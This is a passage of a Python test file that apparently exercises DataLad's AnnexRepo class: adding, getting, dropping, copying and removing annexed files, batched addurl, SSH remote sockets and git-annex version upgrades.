\"untracked\"), \"w\") as f:\n f.write(\"some\")\n assert_raises(FileNotInRepositoryError, ds.commit, files=\"untracked\")\n # not existing file as well:\n assert_raises(FileNotInRepositoryError, ds.commit, files=\"not-existing\")\n\n\n@with_tempfile\ndef test_AnnexRepo_add_to_annex(path=None):\n repo = AnnexRepo(path)\n\n assert_repo_status(repo, annex=True)\n filename = get_most_obscure_supported_name()\n filename_abs = opj(repo.path, filename)\n with open(filename_abs, \"w\") as f:\n f.write(\"some\")\n\n out_json = repo.add(filename)\n # file is known to annex:\n ok_(repo.is_under_annex(filename_abs),\n \"Annexed file is not a link.\")\n assert_in('key', out_json)\n key = repo.get_file_annexinfo(filename)['key']\n assert_false(key == '')\n assert_equal(key, out_json['key'])\n ok_(repo.file_has_content(filename))\n\n # uncommitted:\n ok_(repo.dirty)\n\n repo.commit(\"Added file to annex.\")\n assert_repo_status(repo, annex=True)\n\n # now using commit/msg options:\n filename = \"another.txt\"\n with open(opj(repo.path, filename), \"w\") as f:\n f.write(\"something else\")\n\n repo.add(filename)\n repo.commit(msg=\"Added another file to annex.\")\n # known to annex:\n fileprops = repo.get_file_annexinfo(filename, eval_availability=True)\n ok_(fileprops['key'])\n ok_(fileprops['has_content'])\n\n # and committed:\n assert_repo_status(repo, annex=True)\n\n\n@with_tempfile\ndef test_AnnexRepo_add_to_git(path=None):\n repo = AnnexRepo(path)\n\n assert_repo_status(repo, annex=True)\n filename = get_most_obscure_supported_name()\n with open(opj(repo.path, filename), \"w\") as f:\n f.write(\"some\")\n repo.add(filename, git=True)\n\n # not in annex, but in git:\n eq_(repo.get_file_annexinfo(filename), {})\n # uncommitted:\n ok_(repo.dirty)\n repo.commit(\"Added file to annex.\")\n assert_repo_status(repo, annex=True)\n\n # now using commit/msg options:\n filename = \"another.txt\"\n with open(opj(repo.path, filename), \"w\") as f:\n f.write(\"something else\")\n\n repo.add(filename, git=True)\n repo.commit(msg=\"Added another file to annex.\")\n # not in annex, but in git:\n eq_(repo.get_file_annexinfo(filename), {})\n\n # and committed:\n assert_repo_status(repo, annex=True)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get(src=None, dst=None):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n annex = AnnexRepo.clone(src, dst)\n assert_is_instance(annex, AnnexRepo, 
\"AnnexRepo was not created.\")\n testfile = 'test-annex.dat'\n testfile_abs = opj(dst, testfile)\n assert_false(annex.file_has_content(\"test-annex.dat\"))\n with swallow_outputs():\n annex.get(testfile)\n ok_(annex.file_has_content(\"test-annex.dat\"))\n ok_file_has_content(testfile_abs, \"content to be annex-addurl'd\", strip=True)\n\n called = []\n # for some reason yoh failed mock to properly just call original func\n orig_run = annex._git_runner.run_on_filelist_chunks\n\n def check_run(cmd, files, **kwargs):\n cmd_name = cmd[cmd.index('annex') + 1]\n called.append(cmd_name)\n if cmd_name == 'find':\n assert_not_in('-J5', cmd)\n elif cmd_name == 'get':\n assert_in('-J5', cmd)\n else:\n raise AssertionError(\n \"no other commands so far should be ran. Got %s\" % cmd\n )\n return orig_run(cmd, files, **kwargs)\n\n annex.drop(testfile)\n with patch.object(GitWitlessRunner, 'run_on_filelist_chunks',\n side_effect=check_run), \\\n swallow_outputs():\n annex.get(testfile, jobs=5)\n eq_(called, ['find', 'get'])\n ok_file_has_content(testfile_abs, \"content to be annex-addurl'd\", strip=True)\n\n\n@with_tree(tree={'file.dat': 'content'})\n@with_tempfile\ndef test_v7_detached_get(opath=None, path=None):\n # http://git-annex.branchable.com/bugs/get_fails_to_place_v7_unlocked_file_content_into_the_file_tree_in_v7_in_repo_with_detached_HEAD/\n origin = AnnexRepo(opath, create=True, version=7)\n GitRepo.add(origin, 'file.dat') # force direct `git add` invocation\n origin.commit('added')\n\n AnnexRepo.clone(opath, path)\n repo = AnnexRepo(path)\n # test getting in a detached HEAD\n repo.checkout('HEAD^{}')\n repo.call_annex(['upgrade']) # TODO: .upgrade ?\n\n repo.get('file.dat')\n ok_file_has_content(op.join(repo.path, 'file.dat'), \"content\")\n\n\n# TODO:\n#def init_remote(self, name, options):\n#def enable_remote(self, name):\n\[email protected](\"batch\", [False, True])\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_contentlocation(src=None, path=None, work_dir_outside=None, *, batch):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n annex = AnnexRepo.clone(src, path)\n fname = 'test-annex.dat'\n key = annex.get_file_annexinfo(fname)['key']\n # MIH at this point the whole test and get_contentlocation() itself\n # is somewhat moot. 
The above call already has properties like\n # 'hashdirmixed', 'hashdirlower', and 'key' from which the location\n # could be built.\n # with eval_availability=True, it also has 'objloc' with a absolute\n # path to a verified annex key location\n\n # TODO: see if we can avoid this or specify custom exception\n eq_(annex.get_contentlocation(key, batch=batch), '')\n\n with swallow_outputs() as cmo:\n annex.get(fname)\n key_location = annex.get_contentlocation(key, batch=batch)\n assert(key_location)\n\n if annex.is_managed_branch():\n # the rest of the test assumes annexed files being symlinks\n return\n\n # they both should point to the same location eventually\n eq_((annex.pathobj / fname).resolve(),\n (annex.pathobj / key_location).resolve())\n\n # test how it would look if done under a subdir of the annex:\n with chpwd(opj(annex.path, 'subdir'), mkdir=True):\n key_location = annex.get_contentlocation(key, batch=batch)\n # they both should point to the same location eventually\n eq_((annex.pathobj / fname).resolve(),\n (annex.pathobj / key_location).resolve())\n\n # test how it would look if done under a dir outside of the annex:\n with chpwd(work_dir_outside, mkdir=True):\n key_location = annex.get_contentlocation(key, batch=batch)\n # they both should point to the same location eventually\n eq_((annex.pathobj / fname).resolve(),\n (annex.pathobj / key_location).resolve())\n\n\n@known_failure_windows\n@with_tree(tree=(('about.txt', 'Lots of abouts'),\n ('about2.txt', 'more abouts'),\n ('about2_.txt', 'more abouts_'),\n ('d', {'sub.txt': 'more stuff'})))\n@serve_path_via_http()\n@with_tempfile\ndef test_AnnexRepo_addurl_to_file_batched(sitepath=None, siteurl=None, dst=None):\n\n if dl_cfg.get('datalad.fake-dates'):\n raise SkipTest(\n \"Faked dates are enabled; skipping batched addurl tests\")\n\n ar = AnnexRepo(dst, create=True)\n testurl = urljoin(siteurl, 'about.txt')\n testurl2 = urljoin(siteurl, 'about2.txt')\n testurl2_ = urljoin(siteurl, 'about2_.txt')\n testurl3 = urljoin(siteurl, 'd/sub.txt')\n url_file_prefix = urlsplit(testurl).netloc.split(':')[0]\n testfile = 'about.txt'\n testfile2 = 'about2.txt'\n testfile2_ = 'about2_.txt'\n testfile3 = opj('d', 'sub.txt')\n\n # add to an existing but not committed file\n # TODO: __call__ of the BatchedAnnex must be checked to be called\n copyfile(opj(sitepath, 'about.txt'), opj(dst, testfile))\n # must crash sensibly since file exists, we shouldn't addurl to non-annexed files\n with assert_raises(AnnexBatchCommandError):\n ar.add_url_to_file(testfile, testurl, batch=True)\n\n # Remove it and re-add\n unlink(opj(dst, testfile))\n ar.add_url_to_file(testfile, testurl, batch=True)\n\n info = ar.info(testfile)\n eq_(info['size'], 14)\n assert(info['key'])\n # not even added to index yet since we this repo is with default batch_size\n assert_not_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n\n # TODO: none of the below should re-initiate the batch process\n\n # add to an existing and staged annex file\n copyfile(opj(sitepath, 'about2.txt'), opj(dst, testfile2))\n ar.add(testfile2)\n ar.add_url_to_file(testfile2, testurl2, batch=True)\n assert(ar.info(testfile2))\n # not committed yet\n # assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile2))\n\n # add to an existing and committed annex file\n copyfile(opj(sitepath, 'about2_.txt'), opj(dst, testfile2_))\n ar.add(testfile2_)\n if ar.is_direct_mode():\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n else:\n assert_not_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n 
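    # (editor's note, not part of the original test) With batch=True,
    # add_url_to_file() is expected to feed a long-running batched
    # `git annex addurl` process (roughly `git annex addurl --batch --json
    # --with-files`; the exact options used may differ) one "<url> <file>"
    # line per call instead of spawning a new process each time. Its additions
    # are only reflected in whereis()/the index once the batch process is
    # flushed, which the commit() just below triggers.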
ar.commit(\"added about2_.txt and there was about2.txt lingering around\")\n # commit causes closing all batched annexes, so testfile gets committed\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n assert(not ar.dirty)\n ar.add_url_to_file(testfile2_, testurl2_, batch=True)\n assert(ar.info(testfile2_))\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile2_))\n\n # add into a new file\n # filename = 'newfile.dat'\n filename = get_most_obscure_supported_name()\n\n # Note: The following line was necessary, since the test setup just\n # doesn't work with singletons\n # TODO: Singleton mechanic needs a general solution for this\n AnnexRepo._unique_instances.clear()\n ar2 = AnnexRepo(dst, batch_size=1)\n\n with swallow_outputs():\n eq_(len(ar2._batched), 0)\n ar2.add_url_to_file(filename, testurl, batch=True)\n eq_(len(ar2._batched), 1) # we added one more with batch_size=1\n ar2.precommit() # to possibly stop batch process occupying the stdout\n ar2.commit(\"added new file\") # would do nothing ATM, but also doesn't fail\n assert_in(filename, ar2.get_files())\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar2.whereis(filename))\n\n ar.commit(\"actually committing new files\")\n assert_in(filename, ar.get_files())\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(filename))\n # this poor bugger still wasn't added since we used default batch_size=0 on him\n\n # and closing the pipes now shouldn't anyhow affect things\n eq_(len(ar._batched), 1)\n ar._batched.close()\n eq_(len(ar._batched), 1) # doesn't remove them, just closes\n assert(not ar.dirty)\n\n ar._batched.clear()\n eq_(len(ar._batched), 0) # .clear also removes\n\n raise SkipTest(\"TODO: more, e.g. add with a custom backend\")\n # TODO: also with different modes (relaxed, fast)\n # TODO: verify that file is added with that backend and that we got a new batched process\n\n\n@with_tree(tree={\"foo\": \"foo content\"})\n@serve_path_via_http()\n@with_tree(tree={\"bar\": \"bar content\"})\ndef test_annexrepo_fake_dates_disables_batched(sitepath=None, siteurl=None, dst=None):\n ar = AnnexRepo(dst, create=True, fake_dates=True)\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n ar.add_url_to_file(\"foo-dst\", urljoin(siteurl, \"foo\"), batch=True)\n cml.assert_logged(\n msg=\"Not batching addurl call because fake dates are enabled\",\n level=\"DEBUG\",\n regex=False)\n\n ar.add(\"bar\")\n ar.commit(\"add bar\")\n key = ar.get_content_annexinfo([\"bar\"]).popitem()[1]['key']\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n ar.drop_key(key, batch=True)\n cml.assert_logged(\n msg=\"Not batching drop_key call because fake dates are enabled\",\n level=\"DEBUG\",\n regex=False)\n\n\n@with_tempfile(mkdir=True)\ndef test_annex_backends(path=None):\n path = Path(path)\n repo_default = AnnexRepo(path / \"r_default\")\n eq_(repo_default.default_backends, None)\n\n repo_kw = AnnexRepo(path / \"repo_kw\", backend='MD5E')\n eq_(repo_kw.default_backends, ['MD5E'])\n\n # persists\n repo_kw = AnnexRepo(path / \"repo_kw\")\n eq_(repo_kw.default_backends, ['MD5E'])\n\n repo_config = AnnexRepo(path / \"repo_config\")\n repo_config.config.set(\"annex.backend\", \"MD5E\", reload=True)\n eq_(repo_config.default_backends, [\"MD5E\"])\n\n repo_compat = AnnexRepo(path / \"repo_compat\")\n repo_compat.config.set(\"annex.backends\", \"MD5E WORM\", reload=True)\n eq_(repo_compat.default_backends, [\"MD5E\", \"WORM\"])\n\n\n# ignore deprecation warnings since here we should not use high level\n# interface like push\[email protected](r\"ignore: 
AnnexRepo.copy_to\\(\\) is deprecated\")\n@skip_nomultiplex_ssh # too much of \"multiplex\" testing\n@with_tempfile(mkdir=True)\ndef test_annex_ssh(topdir=None):\n # On Xenial, this hangs with a recent git-annex. It bisects to git-annex's\n # 7.20191230-142-g75059c9f3. This is likely due to an interaction with an\n # older openssh version. See\n # https://git-annex.branchable.com/bugs/SSH-based_git-annex-init_hang_on_older_systems___40__Xenial__44___Jessie__41__/\n if external_versions['cmd:system-ssh'] < '7.4' and \\\n external_versions['cmd:annex'] <= '8.20200720.1':\n raise SkipTest(\"Test known to hang\")\n\n topdir = Path(topdir)\n rm1 = AnnexRepo(topdir / \"remote1\", create=True)\n rm2 = AnnexRepo.clone(rm1.path, str(topdir / \"remote2\"))\n rm2.remove_remote(DEFAULT_REMOTE)\n\n main_tmp = AnnexRepo.clone(rm1.path, str(topdir / \"main\"))\n main_tmp.remove_remote(DEFAULT_REMOTE)\n repo_path = main_tmp.path\n del main_tmp\n remote_1_path = rm1.path\n remote_2_path = rm2.path\n\n from datalad import ssh_manager\n\n # check whether we are the first to use these sockets:\n hash_1 = get_connection_hash('datalad-test')\n socket_1 = opj(str(ssh_manager.socket_dir), hash_1)\n hash_2 = get_connection_hash('datalad-test2')\n socket_2 = opj(str(ssh_manager.socket_dir), hash_2)\n datalad_test_was_open = exists(socket_1)\n datalad_test2_was_open = exists(socket_2)\n\n # repo to test:AnnexRepo(repo_path)\n # At first, directly use git to add the remote, which should be recognized\n # by AnnexRepo's constructor\n gr = GitRepo(repo_path, create=True)\n gr.add_remote(\"ssh-remote-1\", \"ssh://datalad-test\" + remote_1_path)\n\n ar = AnnexRepo(repo_path, create=False)\n\n # socket was not touched:\n if datalad_test_was_open:\n ok_(exists(socket_1))\n else:\n ok_(not exists(socket_1))\n\n # remote interaction causes socket to be created:\n (ar.pathobj / \"foo\").write_text(\"foo\")\n (ar.pathobj / \"bar\").write_text(\"bar\")\n ar.add(\"foo\")\n ar.add(\"bar\")\n ar.commit(\"add files\")\n\n ar.copy_to([\"foo\"], remote=\"ssh-remote-1\")\n # copy_to() opens it if needed.\n #\n # Note: This isn't racy because datalad-sshrun should not close this itself\n # because the connection was either already open before this test or\n # copy_to(), not the underlying git-annex/datalad-sshrun call, opens it.\n ok_(exists(socket_1))\n\n # add another remote:\n ar.add_remote('ssh-remote-2', \"ssh://datalad-test2\" + remote_2_path)\n\n # socket was not touched:\n if datalad_test2_was_open:\n # FIXME: occasionally(?) 
fails in V6:\n # ok_(exists(socket_2))\n pass\n else:\n ok_(not exists(socket_2))\n\n # copy to the new remote:\n #\n # Same racy note as the copy_to() call above.\n ar.copy_to([\"foo\"], remote=\"ssh-remote-2\")\n\n if not exists(socket_2): # pragma: no cover\n # @known_failure (marked for grep)\n raise SkipTest(\"test_annex_ssh hit known failure (gh-4781)\")\n\n # Check that git-annex is actually using datalad-sshrun.\n fail_cmd = quote_cmdlinearg(sys.executable) + \"-c 'assert 0'\"\n with patch.dict('os.environ', {'GIT_SSH_COMMAND': fail_cmd}):\n with assert_raises(CommandError):\n ar.copy_to([\"bar\"], remote=\"ssh-remote-2\")\n ar.copy_to([\"bar\"], remote=\"ssh-remote-2\")\n\n ssh_manager.close(ctrl_path=[socket_1, socket_2])\n\n\n@with_tempfile\ndef test_annex_remove(path=None):\n ar = AnnexRepo(path)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n repo = AnnexRepo(path, create=False)\n\n file_list = list(repo.get_content_annexinfo(init=None))\n assert len(file_list) >= 1\n # remove a single file\n out = repo.remove(str(file_list[0]))\n assert_not_in(file_list[0], repo.get_content_annexinfo(init=None))\n eq_(out[0], str(file_list[0].relative_to(repo.pathobj)))\n\n with open(opj(repo.path, \"rm-test.dat\"), \"w\") as f:\n f.write(\"whatever\")\n\n # add it\n repo.add(\"rm-test.dat\")\n\n # remove without '--force' should fail, due to staged changes:\n assert_raises(CommandError, repo.remove, \"rm-test.dat\")\n assert_in(\"rm-test.dat\", repo.get_annexed_files())\n\n # now force:\n out = repo.remove(\"rm-test.dat\", force=True)\n assert_not_in(\"rm-test.dat\", repo.get_annexed_files())\n eq_(out[0], \"rm-test.dat\")\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_repo_version_upgrade(path1=None, path2=None, path3=None):\n with swallow_logs(new_level=logging.INFO) as cm:\n # Since git-annex 7.20181031, v6 repos upgrade to v7.\n # Future proofing: We will test on v6 as long as it is upgradeable,\n # but would switch to first upgradeable after\n Uversion = 6 if 6 in _GIT_ANNEX_VERSIONS_INFO[\"upgradable\"] \\\n else _GIT_ANNEX_VERSIONS_INFO[\"upgradeable\"][0]\n v_first_supported = next(i for i in _GIT_ANNEX_VERSIONS_INFO[\"supported\"] if i >= Uversion)\n annex = AnnexRepo(path1, create=True, version=Uversion)\n assert_repo_status(path1, annex=True)\n v_upgraded_to = int(annex.config.get('annex.version'))\n\n if external_versions['cmd:annex'] <= '10.20220724':\n eq_(v_upgraded_to, v_first_supported)\n assert_in(\"will be upgraded to 8\", cm.out)\n else:\n # 10.20220724-5-g63cef2ae0 started to auto-upgrade to 10, although 8 was the\n # lowest supported. 
In general we can only assert that we upgrade into one\n # of the supported\n assert_in(v_upgraded_to, _GIT_ANNEX_VERSIONS_INFO[\"supported\"])\n assert_in(\"will be upgraded to %s or later version\" % v_first_supported, cm.out)\n\n # default from config item (via env var):\n with patch.dict('os.environ', {'DATALAD_REPO_VERSION': str(Uversion)}):\n # and check consistency of upgrading to the default version:\n annex = AnnexRepo(path2, create=True)\n version = int(annex.config.get('annex.version'))\n eq_(version, v_upgraded_to)\n\n\[email protected](\"version\", _GIT_ANNEX_VERSIONS_INFO[\"supported\"])\ndef test_repo_version_supported(version, tmp_path):\n # default from config item (via env var):\n Uversion = _GIT_ANNEX_VERSIONS_INFO[\"upgradable\"][0]\n with patch.dict('os.environ', {'DATALAD_REPO_VERSION': str(Uversion)}):\n # ...parameter `version` still has priority over default config:\n annex = AnnexRepo(str(tmp_path), create=True, version=version)\n annex_version = int(annex.config.get('annex.version'))\n if not annex.is_managed_branch():\n # There is no \"upgrade\" for any of the supported versions.\n # if we are not in adjusted branch\n eq_(annex_version, version)\n else:\n print(\"HERE\")\n # some annex command might have ran to trigger the update\n assert annex_version in {v for v in _GIT_ANNEX_VERSIONS_INFO[\"supported\"] if v >= version}\n\n\n@skip_if(external_versions['cmd:annex'] > '8.20210428', \"Stopped showing if too quick\")\n@with_tempfile\ndef test_init_scanning_message(path=None):\n with swallow_logs(new_level=logging.INFO) as cml:\n AnnexRepo(path, create=True, version=7)\n # somewhere around 8.20210428-186-g428c91606 git annex changed\n # handling of scanning for unlocked files upon init and started to report\n # \"scanning for annexed\" instead of \"scanning for unlocked\".\n # Could be a line among many (as on Windows) so match=False so we search\n assert_re_in(\".*scanning for .* files\", cml.out, flags=re.IGNORECASE, match=False)\n\n\n# ignore deprecation warnings since that is the test testing that functionality\[email protected](r\"ignore: AnnexRepo.copy_to\\(\\) is deprecated\")\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_annex_copy_to(src=None, origin=None, clone=None):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test.dat').write_text(\"123\\n\")\n ar.save('some', git=True)\n (ar.pathobj / 'test-annex.dat').write_text(\"content\")\n ar.save('some')\n\n repo = AnnexRepo.clone(src, origin)\n remote = AnnexRepo.clone(origin, clone)\n repo.add_remote(\"target\", clone)\n\n assert_raises(IOError, repo.copy_to, \"doesnt_exist.dat\", \"target\")\n assert_raises(FileInGitError, repo.copy_to, \"test.dat\", \"target\")\n assert_raises(ValueError, repo.copy_to, \"test-annex.dat\", \"invalid_target\")\n\n # see #3102\n # \"copying\" a dir shouldn't do anything and not raise.\n os.mkdir(opj(repo.path, \"subdir\"))\n repo.copy_to(\"subdir\", \"target\")\n\n # test-annex.dat has no content to copy yet:\n eq_(repo.copy_to(\"test-annex.dat\", \"target\"), [])\n\n repo.get(\"test-annex.dat\")\n # now it has:\n eq_(repo.copy_to(\"test-annex.dat\", \"target\"), [\"test-annex.dat\"])\n # and will not be copied again since it was already copied\n eq_(repo.copy_to([\"test.dat\", \"test-annex.dat\"], \"target\"), [])\n\n # Test that if we pass a list of items and annex processes them nicely,\n # we would obtain a list back. 
To not stress our tests even more -- let's mock\n def ok_copy(command, **kwargs):\n # Check that we do pass to annex call only the list of files which we\n # asked to be copied\n assert_in('copied1', kwargs['files'])\n assert_in('copied2', kwargs['files'])\n assert_in('existed', kwargs['files'])\n return [\n {\"command\":\"copy\",\"note\":\"to target ...\", \"success\":True,\n \"key\":\"akey1\", \"file\":\"copied1\"},\n {\"command\":\"copy\",\"note\":\"to target ...\", \"success\":True,\n \"key\":\"akey2\", \"file\":\"copied2\"},\n {\"command\":\"copy\",\"note\":\"checking target ...\", \"success\":True,\n \"key\":\"akey3\", \"file\":\"existed\"},\n ]\n # Note that we patch _call_annex_records,\n # which is in turn invoked first by copy_to for \"find\" operation.\n # TODO: provide a dedicated handling within above ok_copy for 'find' command\n with patch.object(repo, '_call_annex_records', ok_copy):\n eq_(repo.copy_to([\"copied2\", \"copied1\", \"existed\"], \"target\"),\n [\"copied1\", \"copied2\"])\n\n # now let's test that we are correctly raising the exception in case if\n # git-annex execution fails\n orig_run = repo._call_annex\n\n # Kinda a bit off the reality since no nonex* would not be returned/handled\n # by _get_expected_files, so in real life -- wouldn't get report about Incomplete!?\n def fail_to_copy(command, **kwargs):\n if command[0] == 'copy':\n # That is not how annex behaves\n # http://git-annex.branchable.com/bugs/copy_does_not_reflect_some_failed_copies_in_--json_output/\n # for non-existing files output goes into stderr\n #\n # stderr output depends on config+version of annex, though:\n if not dl_cfg.getbool(\n section=\"annex\", option=\"skipunknown\",\n # git-annex switched default for this config:\n default=bool(\n external_versions['cmd:annex'] < '10.20220222')):\n\n stderr = \"error: pathspec 'nonex1' did not match any file(s) \" \\\n \"known to git\\n\" \\\n \"error: pathspec 'nonex2' did not match any file(s) \" \\\n \"known to git\\n\"\n else:\n stderr = \"git-annex: nonex1 not found\\n\" \\\n \"git-annex: nonex2 not found\\n\"\n\n raise CommandError(\n \"Failed to run ...\",\n stdout_json=[\n {\"command\":\"copy\",\"note\":\"to target ...\", \"success\":True,\n \"key\":\"akey1\", \"file\":\"copied\"},\n {\"command\":\"copy\",\"note\":\"checking target ...\",\n \"success\":True, \"key\":\"akey2\", \"file\":\"existed\"},\n ],\n stderr=stderr\n )\n else:\n return orig_run(command, **kwargs)\n\n def fail_to_copy_get_expected(files, expr):\n assert files == [\"copied\", \"existed\", \"nonex1\", \"nonex2\"]\n return {'akey1': 10}, [\"copied\"]\n\n with patch.object(repo, '_call_annex', fail_to_copy), \\\n patch.object(repo, '_get_expected_files', fail_to_copy_get_expected):\n with assert_raises(IncompleteResultsError) as cme:\n repo.copy_to([\"copied\", \"existed\", \"nonex1\", \"nonex2\"], \"target\")\n eq_(cme.value.results, [\"copied\"])\n eq_(cme.value.failed, ['nonex1', 'nonex2'])\n\n\n@with_tempfile\n@with_tempfile\ndef test_annex_drop(src=None, dst=None):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test-annex.dat').write_text(\"content\")\n ar.save('some')\n\n ar = AnnexRepo.clone(src, dst)\n testfile = 'test-annex.dat'\n assert_false(ar.file_has_content(testfile))\n ar.get(testfile)\n ok_(ar.file_has_content(testfile))\n eq_(len([f for f in ar.fsck(fast=True) if f['file'] == testfile]), 1)\n\n # drop file by name:\n result = ar.drop([testfile])\n assert_false(ar.file_has_content(testfile))\n ok_(isinstance(result, list))\n eq_(len(result), 1)\n 
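    # (editor's note, not part of the original test) Each element of `result`
    # is one parsed `git annex drop --json` record; the fields asserted below
    # roughly look like (exact field set varies across git-annex versions):
    #   {"command": "drop", "file": "test-annex.dat",
    #    "key": "SHA256E-s7--...", "success": true, "note": "..."}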
eq_(result[0]['command'], 'drop')\n eq_(result[0]['success'], True)\n eq_(result[0]['file'], testfile)\n\n ar.get(testfile)\n\n # drop file by key:\n testkey = ar.get_file_annexinfo(testfile)['key']\n result = ar.drop([testkey], key=True)\n assert_false(ar.file_has_content(testfile))\n ok_(isinstance(result, list))\n eq_(len(result), 1)\n eq_(result[0]['command'], 'drop')\n eq_(result[0]['success'], True)\n eq_(result[0]['key'], testkey)\n\n # insufficient arguments:\n assert_raises(TypeError, ar.drop)\n assert_raises(InsufficientArgumentsError, ar.drop, [], options=[\"--jobs=5\"])\n assert_raises(InsufficientArgumentsError, ar.drop, [])\n\n # too much arguments:\n assert_raises(CommandError, ar.drop, ['.'], options=['--all'])\n\n (ar.pathobj / 'somefile.txt').write_text('this')\n ar.save()\n with assert_raises(CommandError) as e:\n ar.drop('somefile.txt')\n # CommandError has to pull the errors from the JSON record 'note'\n assert_in('necessary cop', str(e.value))\n\n with assert_raises(CommandError) as e:\n ar._call_annex_records(['fsck', '-N', '3'])\n # CommandError has to pull the errors from the JSON record 'error-messages'\n assert_in('1 of 3 trustworthy copies', str(e.value))\n\n\n@with_tree({\"a.txt\": \"a\", \"b.txt\": \"b\", \"c.py\": \"c\", \"d\": \"d\"})\ndef test_annex_get_annexed_files(path=None):\n repo = AnnexRepo(path)\n repo.add(\".\")\n repo.commit()\n eq_(set(repo.get_annexed_files()), {\"a.txt\", \"b.txt\", \"c.py\", \"d\"})\n\n repo.drop(\"a.txt\", options=[\"--force\"])\n eq_(set(repo.get_annexed_files()), {\"a.txt\", \"b.txt\", \"c.py\", \"d\"})\n eq_(set(repo.get_annexed_files(with_content_only=True)),\n {\"b.txt\", \"c.py\", \"d\"})\n\n eq_(set(repo.get_annexed_files(patterns=[\"*.txt\"])),\n {\"a.txt\", \"b.txt\"})\n eq_(set(repo.get_annexed_files(with_content_only=True,\n patterns=[\"*.txt\"])),\n {\"b.txt\"})\n\n eq_(set(repo.get_annexed_files(patterns=[\"*.txt\", \"*.py\"])),\n {\"a.txt\", \"b.txt\", \"c.py\"})\n\n eq_(set(repo.get_annexed_files()),\n set(repo.get_annexed_files(patterns=[\"*\"])))\n\n eq_(set(repo.get_annexed_files(with_content_only=True)),\n set(repo.get_annexed_files(with_content_only=True, patterns=[\"*\"])))\n\n\[email protected](\"batch\", [True, False])\n@with_tree(tree={\"test-annex.dat\": \"content\"})\n@serve_path_via_http()\n@with_tempfile()\n@with_tempfile()\ndef test_is_available(_=None, content_url=None, origpath=None, path=None, *,\n batch):\n\n fname = \"test-annex.dat\"\n content_url += \"/\" + fname\n origds = Dataset(origpath).create()\n origds.repo.add_url_to_file(fname, content_url)\n origds.save()\n origds.drop(fname)\n annex = clone(origpath, path).repo\n\n # bkw = {'batch': batch}\n if batch:\n is_available = partial(annex.is_available, batch=batch)\n else:\n is_available = annex.is_available\n\n key = annex.get_content_annexinfo([fname]).popitem()[1]['key']\n\n # explicit is to verify data type etc\n assert is_available(key, key=True) is True\n assert is_available(fname) is True\n\n # known remote but doesn't have it\n assert is_available(fname, remote=DEFAULT_REMOTE) is False\n\n # If the 'datalad' special remote is present, it will claim fname's URL.\n if DATALAD_SPECIAL_REMOTE in annex.get_remotes():\n remote = DATALAD_SPECIAL_REMOTE\n uuid = DATALAD_SPECIAL_REMOTES_UUIDS[DATALAD_SPECIAL_REMOTE]\n else:\n remote = \"web\"\n uuid = WEB_SPECIAL_REMOTE_UUID\n\n # it is on the 'web'\n assert is_available(fname, remote=remote) is True\n # not effective somehow :-/ may be the process already running or smth\n # with 
swallow_logs(), swallow_outputs(): # it will complain!\n assert is_available(fname, remote='unknown') is False\n assert_false(is_available(\"boguskey\", key=True))\n\n # remove url\n urls = annex.whereis(fname, output=\"full\").get(uuid, {}).get(\"urls\", [])\n\n assert(len(urls) == 1)\n eq_(urls,\n annex.whereis(key, key=True, output=\"full\")\n .get(uuid, {}).get(\"urls\"))\n annex.rm_url(fname, urls[0])\n\n assert is_available(key, key=True) is False\n assert is_available(fname) is False\n assert is_available(fname, remote=remote) is False\n\n\n@with_tempfile(mkdir=True)\ndef test_get_urls_none(path=None):\n ar = AnnexRepo(path, create=True)\n with open(opj(ar.path, \"afile\"), \"w\") as f:\n f.write(\"content\")\n eq_(ar.get_urls(\"afile\"), [])\n\n\n@xfail_buggy_annex_info\n@with_tempfile(mkdir=True)\ndef test_annex_add_no_dotfiles(path=None):\n ar = AnnexRepo(path, create=True)\n print(ar.path)\n assert_true(os.path.exists(ar.path))\n assert_false(ar.dirty)\n os.makedirs(opj(ar.path, '.datalad'))\n # we don't care about empty directories\n assert_false(ar.dirty)\n with open(opj(ar.path, '.datalad', 'somefile'), 'w') as f:\n f.write('some content')\n # make sure the repo is considered dirty now\n assert_true(ar.dirty) # TODO: has been more detailed assertion (untracked file)\n # now add to git, and it should work\n ar.add('.', git=True)\n # all in index\n assert_true(ar.dirty)\n # TODO: has been more specific:\n # assert_false(ar.repo.is_dirty(\n # index=False, working_tree=True, untracked_files=True, submodules=True))\n ar.commit(msg=\"some\")\n # all committed\n assert_false(ar.dirty)\n # not known to annex\n assert_false(ar.is_under_annex(opj(ar.path, '.datalad', 'somefile')))\n\n\n@with_tempfile\ndef test_annex_version_handling_at_min_version(path=None):\n with set_annex_version(AnnexRepo.GIT_ANNEX_MIN_VERSION):\n po = patch.object(AnnexRepo, '_check_git_annex_version',\n side_effect=AnnexRepo._check_git_annex_version)\n with po as cmpc:\n eq_(AnnexRepo.git_annex_version, None)\n ar1 = AnnexRepo(path, create=True)\n assert(ar1)\n eq_(AnnexRepo.git_annex_version, AnnexRepo.GIT_ANNEX_MIN_VERSION)\n eq_(cmpc.call_count, 1)\n # 2nd time must not be called\n try:\n # Note: Remove to cause creation of a new instance\n rmtree(path)\n except OSError:\n pass\n ar2 = AnnexRepo(path)\n assert(ar2)\n eq_(AnnexRepo.git_annex_version, AnnexRepo.GIT_ANNEX_MIN_VERSION)\n eq_(cmpc.call_count, 1)\n\n\n@with_tempfile\ndef 